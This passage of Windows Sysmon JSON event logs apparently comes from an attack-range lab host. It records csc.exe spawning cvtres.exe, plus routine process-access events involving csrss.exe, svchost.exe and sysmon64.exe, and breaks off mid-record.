{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5930,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.148\r\nProcessGuid: {E2A3D6B1-11D9-5F25-0000-001004A50800}\r\nProcessId: 2388\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nFileVersion: 12.00.52519.0 built by: VSWINSERVICING\r\nDescription: Microsoft® Resource File To COFF Object Conversion Utility\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: CVTRES.EXE\r\nCommandLine: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RESF535.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\CSCEB38A6EBE43F431794802EF94F7F1D.TMP\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11D8-5F25-0000-0020C7800800}\r\nLogonId: 0x880C7\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF\r\nParentProcessGuid: {E2A3D6B1-11D9-5F25-0000-001063A10800}\r\nParentProcessId: 4856\r\nParentImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nParentCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\mp0obxps.cmdline\"","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.148","ProcessGuid":"{E2A3D6B1-11D9-5F25-0000-001004A50800}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","FileVersion":"12.00.52519.0 built by: VSWINSERVICING","Description":"Microsoft® Resource File To COFF Object Conversion Utility","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"CVTRES.EXE","CommandLine":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RESF535.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\CSCEB38A6EBE43F431794802EF94F7F1D.TMP\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11D8-5F25-0000-0020C7800800}","LogonId":"0x880c7","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF","ParentProcessGuid":"{E2A3D6B1-11D9-5F25-0000-001063A10800}","ParentProcessId":"4856","ParentImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","ParentCommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\mp0obxps.cmdline\"","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5931,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.135\r\nSourceProcessGUID: {E2A3D6B1-11D9-5F25-0000-001063A10800}\r\nSourceProcessId: 4856\r\nSourceThreadId: 2980\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetProcessGUID: {E2A3D6B1-11D5-5F25-0000-0010C3260800}\r\nTargetProcessId: 2388\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.135","SourceProcessGUID":"{E2A3D6B1-11D9-5F25-0000-001063A10800}","SourceProcessId":"4856","SourceThreadId":"2980","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetProcessGUID":"{E2A3D6B1-11D5-5F25-0000-0010C3260800}","TargetProcessId":"2388","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5932,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.135\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11D5-5F25-0000-0010C3260800}\r\nTargetProcessId: 2388\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.135","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11D5-5F25-0000-0010C3260800}","TargetProcessId":"2388","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5933,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.135\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.135","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5934,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.135\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.135","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5935,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.135\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.135","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5936,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.135\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.135","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5937,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.135\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.135","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\